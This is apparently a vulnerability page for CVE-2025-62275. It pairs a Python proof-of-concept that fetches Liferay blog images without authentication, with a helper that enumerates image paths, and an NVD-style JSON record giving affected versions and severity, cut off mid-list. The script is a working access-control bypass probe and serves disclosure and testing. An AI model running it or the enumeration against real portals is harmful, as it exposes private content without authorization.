CVE-2025-62275

# CVE-2025-62275 PoC - Liferary Portal Blogs Image Permission Bypass # This PoC demonstrates how to access blog images without proper authorization import requests import sys def check_vulnerability(base_url, image_path): """ Check if the target is vulnerable to CVE-2025-62275 Args: base_url: Target Liferary Portal base URL (e.g., https://example.com) image_path: Path to the blog image (e.g., /documents/12345/67890/image.jpg) Returns: bool: True if vulnerable, False otherwise """ target_url = f"{base_url.rstrip('/')}{image_path}" # Send request without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: response = requests.get(target_url, headers=headers, timeout=10, verify=False) # Check if we can access the image without authorization if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'image' in content_type or len(response.content) > 0: print(f"[+] VULNERABLE: Image accessible at {target_url}") print(f"[+] Content-Type: {content_type}") print(f"[+] Content-Length: {len(response.content)} bytes") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] NOT VULNERABLE: Access denied (HTTP {response.status_code})") return False else: print(f"[*] UNKNOWN: HTTP {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return False def enumerate_blog_images(base_url, group_id, folder_id, image_names): """ Enumerate possible blog image URLs Args: base_url: Target Liferary Portal base URL group_id: Liferary group ID folder_id: Document folder ID image_names: List of common image filenames to try """ print("\n[*] Enumerating blog images...") for img_name in image_names: path = f"/documents/{group_id}/{folder_id}/{img_name}" check_vulnerability(base_url, path) if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-62275-poc.py <base_url> <image_path>") print("Example: python cve-2025-62275-poc.py https://target.com /documents/12345/67890/blog-image.png") sys.exit(1) base_url = sys.argv[1] image_path = sys.argv[2] print(f"[*] Testing CVE-2025-62275 on {base_url}") print(f"[*] Target image path: {image_path}\n") check_vulnerability(base_url, image_path)

{"cve": {"id": "CVE-2025-62275", "sourceIdentifier": "[email protected]", "published": "2025-11-01T03:15:31.757", "lastModified": "2025-11-10T16:20:40.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blogs in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions does not check permission of images in a blog entry, which allows remote attackers to view the images in a blog entry via crafted URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:*", "matchCriteriaId": "1EF6451A-2A5D-4222-A1C6-113AA4B8D4E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:*", "matchCriteriaId": "9D6CE430-3C95-4855-BA44-E2E136D1FEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:*", "matchCriteriaId": "44FEB149-C792-493D-B055-568FFC96298A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:*", "matchCriteriaId": "B050DD73-71B6-46CD-A35B-7ACB53BE6C6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.5:*:*:*:*:*:*:*", "matchCriteriaId": "62432289-E1DC-4013-85C7-6B77299A910F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.6:*:*:*:*:*:*:*", "matchCriteriaId": "0912EEFE-DC56-43F6-AE0E-A4E2A033F3C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.7:*:*:*:*:*:*:*", "matchCriteriaId": "9398F679-5F47-4DF2-AA91-4A21126675C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.8:*:*:*:*:*:*:*", "matchCriteriaId": "8296B54A-976A-404C-AB77-0619E4297A69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.9:*:*:*:*:*:*:*", "matchCriteriaId": "F778EB15-2AB0-44C1-BD99-9F7F1851E167"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.10:*:*:*:*:*:*:*", "matchCriteriaId": "625E6C10-D0C7-4C5D-99F8-601A7B942392"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5CE3202-2723-44A6-B63F-061138287FDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A27A8480-7EE1-4265-9117-D6C234ACAC5F"}, {"vulnerable ... (truncated)